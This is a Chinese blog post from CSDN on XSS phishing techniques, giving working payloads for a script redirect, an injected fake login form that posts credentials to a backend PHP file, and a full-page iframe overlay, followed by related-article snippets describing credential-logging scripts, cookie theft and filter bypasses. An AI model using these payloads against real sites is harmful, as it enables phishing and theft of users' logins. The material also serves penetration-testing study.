xss漏洞之——钓鱼页面

最新推荐文章于 2025-03-03 17:59:56 发布
最新推荐文章于 2025-03-03 17:59:56 发布
阅读量2.6k 收藏 5
点赞数 4
分类专栏: 渗透测试(web渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/104652277
版权

1.重定向钓鱼:把当前页面重定向到一个钓鱼页面,此处使用百度测试
代码:

<script>document.location="http://www.baidu.com"</script>

注入后效果:
在这里插入图片描述
在这里插入图片描述
2.HTML 注入式钓鱼:使用 XSS 漏洞注入 HTML 或 JavaScript 代码到页面中
代码(页面注入一个登陆界面,通过后台接收):

<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="LPXR.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html>

执行效果:
在这里插入图片描述
3.iframe 钓鱼:通过 标签嵌入远程域的一个页面实施钓鱼,此处引入百度进行覆盖测试
代码:

<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Title</title></head><body><iframe src="http://www.baidu.com" style="position:absolute;top:0;left:0;width:100%;z-index: 999;height:500px"></iframe></body></html>

执行效果:
在这里插入图片描述

利用XSS进行网页钓鱼
Monsterlz123的博客
07-22 6865
XSS漏洞】利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster。 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点… 说昨天看我朋友圈发的照片,已经从以前的瓜子脸,变成国字脸了… Whatever,让我们一起来看看今天的内容吧 一、实验概述 实验拓扑: 利用XSS漏洞,我们可以在网页中插入恶意js代码,通过js代码,我们可以干很多事情,例...
XSS钓鱼攻击演示。
weixin_44720762的博客
05-01 3584
basic认证的钓鱼攻击: 在存在xss漏洞页面去嵌入一个向用户端提交的请求程序(javascript或者是链接请求。)当用户打开了这个链接,就会向后台发送请求,后台会返回一个如上图所示的basic认证的头部。在用户的安全意识不强,为察觉出其中异样的情况下如实输入了自己的用户信息。这时候信息被发送到攻击人员的接受端。 相关的嵌入代码 相关的basic认证提示框代码 xfish原代码 具体内容:...
实验27:xss钓鱼演示
qq_44720671的博客
04-18 1015
实验思路: 我们会用basic认证来做一个钓鱼的场景 我们可以在存在着xss漏洞页面里面嵌入一个请求,当用户打开这个嵌入了恶意代码的页面,用户的页面就会弹出图中的登陆框,如果用户的安全意识不太够,那么就会把账号和密码发送到我们的pkxs后台 我们在pikachu的储存型XSS上来做演示,输入这个payload 点提交后 因为他是个存储型xss,所以我们的留言板里已经留下了,所以我们刷新一下...
每个 Web 开发人员都应该知道的 4 个 iframe 安全问题
最新发布
ewii12567的博客
03-03 1230
iframe 能提高用户的互动性。但是,当你使用 iframe 的时候,你处理的内容是来自于你无法控制的第三方。因此,iframe 经常会对你的应用程序造成威胁。然而,我们不能因为安全顾虑就停止使用 iframe。我们需要意识到这些问题并采取防范措施来保护我们的应用程序。我认为这篇文章能帮你识别使用 iframe 的安全问题。在下方评论区让我知道你的看法。如果发现译文存在错误或其他需要改进的地方,欢迎到掘金翻译计划对译文进行修改并 PR,也可获得相应奖励积分。文章开头的本文永久链接。
XSS钓鱼某网约车后台一探究竟,乘客隐私暴露引发思考
dfdhxb995397的博客
05-16 290
i春秋作家:onls辜釉 最近的某顺风车命案,把网约车平台推上了风口浪尖,也将隐私信息管理、审查的讨论面进一步扩大。这让我不禁联想起自己今年春节的遭遇,当时公司放假准备回家过年,我妈给我推荐了一个在我们那十八线小城当时正搞活动的网约车平台,从市火车站到县里原本100+的车费,平台新用户只需1元。是个没听过的平台本有点不放心,不过抱着尝试新鲜事物(穷)的心态还是下载注册了试试,但出...
酷狗存储XSS之QQ空间钓鱼页面分析
Tesi1a的充电桩
01-03 1345
0x00 背景 同学遇到的一个QQ空间的盗号的链接,说让我帮忙抓包分析下: 结论:分析后发现实际上是酷狗的网页存在存储型XSS漏洞,且被用来做钓鱼攻击了。 0x01攻击流程 下面通过复现流程来看看我们的账号是怎么被盗的吧。 0.好友发过来的链接: 原始链接为:https://kuwosing.kuwo.cn/ksingnew/match/matchworks.htm?wid=284672...
XSS漏洞——渗透day08
qq_62716256的博客
09-04 664
XSS漏洞——渗透day08
WEB漏洞篇——跨站脚本攻击(XSS
m0_56634355的博客
06-05 4921
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
搜索框——不能忽视的XSS漏洞—搜索框所引起的XSS漏洞
06-12
**XSS漏洞详解:搜索框的安全隐患** XSS(Cross-site scripting)是一种常见的网络安全漏洞,源于Web应用程序未能正确处理用户输入的数据,导致攻击者能够注入恶意脚本,进而影响其他用户的浏览器。这种漏洞最早...
2025.1.21——六、BUU XSS COURSE 1 XSS漏洞|XSS平台搭建
2402_87387800的博客
01-23 2149
题目来源:buuctf BUU XSS COURSE 1。
XSS漏洞利用---存储型XSS钓鱼
Ethan024的博客
03-13 1265
XSS漏洞利用(本文仅供技术学习与分享) 存储型XSS漏洞钓鱼 实验准备 pikachu平台为存在XSS漏洞平台的站点; 用户正常访问该站点; 攻击者搭建的,以供收集数据的后台(皮卡丘后台预备好了pkxss平台); 实验思路(使用basic认证做钓鱼) 制作钓鱼鱼儿:WWW Authenticate:Basic 即:在存在XSS漏洞页面上嵌入请求(JavaScript或其他链接)。当用户点击打开嵌入恶意代码页面的时候,该页面会向后台发送请求,该请求会要求用户返回basic认证。因此在用户界面就会弹出
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 8479
前端js代码限制输入框只能提交20个字段,将它修改为100即可(当然,这是get型xss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
xss实现钓鱼操作
weixin_38168786的博客
01-29 1422
自己写一个和原网站后台登录地址一模一样的钓鱼页面JS加载一个iframe 100%覆盖原网页 提示登录超时重新登录 因为是iframe加载 url地址不变 钓鱼成功后 再跳转回/admin/index.php 因为目标session没过期 所以可以极大程度的模拟正常的登录成功操作。 注入如下代码: 1 setTimeout(function(){ 2 parent.docum...
XSS钓鱼攻击
WINDY_PACE的博客
05-13 1618
XSS 不与后台服务器产⽣数据交互,通过前端的dom节点形成的XSS漏洞,跟服务器⽆关。⼀...
xss漏洞钓鱼
rescure的博客
01-21 1141
利用xss漏洞钓鱼 简要:由于资金问题,没有自己的网站,故在此用xss平台和dvwa实现xss反射型钓鱼操作 NO.1 正常进入dvwa,模式选择为low,使用xss(refelect) 进入xss平台,选择创建项目,在此为dvwa,创建之后,选择功能默认即可 ,随后平台会生成自己的js代码 NO.2 接下来,复制生成的js代码,粘贴至xss漏洞处(具体情况需要自己分析是什么类型的) 接下来就是copy大法了 ...
xss钓鱼演示
qq_42764906的博客
04-22 302
在存储型XSS里输入(注:和上一节一样需要根据路径更改网址) 得到(弹出) 因为是存储型XSS 再次打开还会弹出这个页面
XSS钓鱼和组合拳技巧
goddemon
09-11 693
一.xss钓鱼 ①保存账户密码的后端钓鱼网页 保存js&css到服务器,登录action改为接受密码的文件action="./pass.php" <?php //php $user=$\_POST\['username'\]; $pass=$\_POST\['password'\]; $file=fopen('pass.txt','a+'); fwrite($file,$user."|"."pass" . "\\n"); fclose($file); echo "&lt
xss——flash钓鱼 (kali MSF捆绑钓鱼)超详细!小白也可以!
qq_48368964的博客
07-23 2108
kali系统虚拟机(攻击者监听设备、制作木马),Win10物理机(受害者目标主机),winrar压缩软件(用于伪装木马),phpstudy(搭建模拟钓鱼网站)
XSS 绕过实例, 钓鱼网站,会话劫持
buffedon的博客
05-26 1410
XSS原理--防御--绕过实例原理危害防护绕过实例场景一:事件+单引号闭合场景二:大小写绕过场景三:双写绕过场景四:JavaScript伪协议+编码场景五:事件+%0a当做空格场景六:http头部参数插入payload场景七:文件解析 原理 危害 防护 绕过实例 场景一:事件+单引号闭合 ‘οnmοuseοver=alert(1)’ 查看源代码后发现,value是要用单引号进行闭合 场景二:大小写绕过 "><scRIp>alert(1)</script><" 发现
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值